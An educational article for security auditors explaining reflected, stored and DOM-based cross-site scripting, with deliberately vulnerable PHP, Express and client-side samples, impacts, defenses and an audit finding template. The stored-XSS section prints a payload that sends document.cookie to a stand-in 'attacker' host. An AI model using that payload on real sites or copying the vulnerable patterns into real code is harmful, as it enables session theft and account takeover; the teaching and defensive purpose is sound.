Cross-site scripting, abbreviated XSS, is the oldest, most persistent web vulnerability. It is also one of the most misunderstood, because developers often treat it like an input validation problem, while attackers treat it like an opportunity to own a browser and everything the victim can do in that browser. For security auditors and ethical hackers, XSS should be evaluated not just as a bug to report, but as a chain that includes user impact, detection gaps, and operational risk to the business. Below I explain the three main classes of XSS, show concise code examples for each, describe how those examples work, and finish with pragmatic defenses and testing guidance you can apply during audits or red team engagements.
Types of XSS, simply
- Reflected XSS: The server reflects attacker-controlled input immediately in an HTTP response, without proper encoding. The payload arrives in a crafted link or HTTP request, the server echoes it back, the browser executes it, and the attacker's code runs in the victim's context.
- Stored XSS: The application persists attacker input to a backend store, like a database, comment feed, or user profile. Later, other users load the page and receive the malicious script. Stored XSS scales because one injection can infect many victims.
- DOM-based XSS: All injection and execution happens inside client-side JavaScript, not on the server. The page's DOM APIs are used insecurely, for example by writing
location.hashintoinnerHTML. If the script builds HTML from untrusted parts of the URL, the browser will run attacker code even though the server never injected it.
These types matter because they shape detection tactics, response playbooks, and how likely an issue is to become a production incident.
Minimal code examples and how they work
Below are small, purposely simple examples intended to illustrate mechanics for auditors and ethical hackers. They are not exploit tutorials, they are explanatory templates you can use to verify a finding or explain impact to developers.
1) Reflected XSS — simple PHP example
// search.php <?php $q = $_GET['q'] ?? '' ?> <html> <body> <form method="get" action="search.php"> <input name="q" value="<?php echo $q; ?>" /> <input type="submit" value="Search" /> </form> <p>Results for: <?php echo $q; ?></p> </body> </html>
How it works: the q parameter from the URL is written into the page twice with no encoding. An attacker crafts a URL like https://example.com/search.php?q=<script>alert(1)</script> and convinces a victim to click it. When the victim's browser requests the URL, the server reflects the payload into the response, the browser parses the <script> tag, and executes it.
Why auditors care: reflected XSS is often used in phishing campaigns where a malicious link is the trigger. It's quick to find, and its risk depends on who you can social-engineer.
2) Stored XSS — Node.js/Express comment example
// server.js (very simple) const express = require('express'); const bodyParser = require('body-parser'); const app = express();
let comments = []; // naive in-memory store for demonstration
app.use(bodyParser.urlencoded({ extended: false }));
app.get('/comments', (req, res) => { let html = '<form method="post" action="/comment"><input name="text"><button>Post</button></form>' for (const c of comments) { html += `<div class="comment">${c}</div>`; // unsanitized output } res.send(html); });
app.post('/comment', (req, res) => { comments.push(req.body.text); res.redirect('/comments'); });
app.listen(3000);
How it works: an attacker posts a comment containing <img src=x onerror=fetch('https://attacker/steal?c='+document.cookie)>. That string is stored in comments. When any user visits /comments, the server inserts the stored string directly into the HTML, the browser interprets it, and the onerror fires. Stored XSS is powerful because the attacker needs to inject only once, then spread payloads via social channels or rely on organic traffic.
Why auditors care: stored XSS can lead to account takeover, persistent session theft, or supply-chain style compromises if user-generated content is syndicated to many consumers or APIs.
3) DOM-based XSS — client-side example
<! — index.html → <html> <body> <div id="greeting"></div> <script> // insecure: writing the hash directly into DOM document.getElementById('greeting').innerHTML = location.hash.substring(1); </script> </body> </html>
How it works: an attacker gives a victim a URL like https://example.com/index.html#<img src=x onerror=alert(1)>. The browser loads the page, client JavaScript reads location.hash and injects it into innerHTML without encoding. The payload runs purely inside the victim's browser, and crucially the server never sees the bad content.
Why auditors care: DOM XSS often slips past server-side scanners. It requires carefully reviewing client-side code, not just inputs or responses.
Real-world impacts: user, brand, and audit perspective
- User impact: session theft, forced actions using the victim's privileges, keylogging inside forms, credential harvest via cloned login dialogs, malware download prompts when user action is required, or silent API calls to exfiltrate data.
- Brand impact: reputational damage from phishing campaigns that appear to come from the brand, legal exposure if personal data is exfiltrated, loss of customer trust and conversion rates, long tail of clean-up costs when cached pages or syndicated content carry malicious scripts.
- Audit perspective: XSS findings should be rated for both technical severity and business reach. A reflected XSS on an internal admin panel may be high for confidentiality and integrity but low for public exposure. A stored XSS in a high-traffic comments feed or a marketing CDN endpoint is high for both exposure and impact.
Pragmatic defenses: developer and responder checklists
For developers, prioritized fixes
- Output encoding by context: encode for HTML body, attribute, JavaScript, CSS, and URL contexts. Use the platform/framework encoding library, do not hand roll encoders.
- Sanitize dangerous HTML only if you must allow it: prefer safe subsets like Markdown rendered server side to trusted HTML, use vetted libraries such as OWASP Java HTML Sanitizer or DOMPurify for browser sanitization.
- Use secure cookie attributes:
HttpOnly,Secure,SameSite=strictwhere feasible, and rotate session tokens after sensitive actions. - Apply Content Security Policy (CSP) as defense in depth: use
script-srcwith nonces or strict hashes, enablereport-uriorreport-tofor telemetry. CSP is not a replacement for encoding but it limits damage. - Avoid
.innerHTMLand similar sinks: prefertextContent,setAttribute, or safe DOM APIs when inserting untrusted data. - Principle of least privilege for UIs: minimize where user inputs are rendered, and where possible, separate user-content rendering from code-execution surfaces.
- Logging and telemetry: log attempted script injection patterns, track CSP violation reports, and alert on spikes.
For incident responders and auditors
- Containment: identify affected endpoints, remove or neutralize stored payloads, rotate sessions and credentals if tokens may have been compromised.
- Forensic capture: preserve logs, capture payloads, and record known recipients to support disclosure and legal work.
- CSP report analysis: use CSP reports to find recurring payloads or blind spots in coverage.
- Customer notification plan: if compromise led to data exfiltration, follow the organization's incident response and legal guidance for timely notifications.
- Remediation verification: require both server-side fixes and client-side code review, plus re-scanning with authenticated crawlers and DAST tools.
Testing guidance for auditors and ethical hackers
- Check output contexts: test the same parameter rendered into HTML body, attribute, URL, and inline script. A parameter may be safe in one context and vulnerable in another.
- Test all user roles and content flows: stored XSS often shows up in profile fields, file names, image metadata, export features, and admin consoles.
- Inspect client-side templates: review framework templates, 3rd party widgets, single page app routing, and unsafe DOM APIs.
- Use authenticated scans plus manual verification: automated scanners find surface issues; manual tests uncover logic and chained problems.
- Proof of concept rules: when showing impact to stakeholders, use harmless POC payloads like
alert(1)orconsole.log('xss'), explain the exploitability path, and avoid publishing POC payloads that would let attackers reproduce attacks easily at scale. - Prioritize by reach: a stored XSS on the homepage or a syndicated API is worth more points than a reflected XSS on a single low-traffic endpoint.
Common developer mistakes and how to spot them
- Relying solely on input validation: attackers can craft inputs that pass validation and still break encoding rules in certain contexts.
- Sanitizer misconfiguration: allowing attributes like
onload,onclick, orsrcdocin sanitized output, or trusting obsolete libraries. - Overlooking third-party widgets: comment embeds, analytics scripts, or ad tech can introduce vectors or amplify an XSS.
- Assuming HTTPS equals safety: SSL protects transport, not execution in the browser.
Sample audit finding template (concise, actionable)
Title: Stored XSS in public comments, user profile, or feed
Affected: POST /comment, displayed at GET /comments
Impact: High, persistent, can exfiltrate session tokens and perform actions as users.
Evidence: stored payload string ... persisted, rendered without encoding in the .comment element.
Reproduction: safe PoC used: alert('XSS') inserted as comment then reflected on /comments.
Recommendation: encode output for HTML context, sanitize permitted HTML with a vetted library, apply HttpOnly for session cookie, deploy CSP with nonce-based script-src.
Priority: Critical for public high-traffic endpoints, Medium for low-traffic internal pages.
Final notes, practical posture
Treat XSS as a systems problem, not an input problem. The vulnerability sits at the intersection of developer practices, client-side behavior, and operational telemetry. For auditors, that means checking code, templates, storage, and delivery chains. For ethical hackers, that means proving impact responsibly, aligning with disclosure policies, and showing how a single string can turn a browser into an attacker-controlled agent. Fixing XSS improves confidentiality and integrity, and often reduces downstream phishing and social engineering risks, so it is high leverage work.
To learn about XSS, follow the link to my website and build a XSS lab from the ground up, and practice a variety of XSS exploits: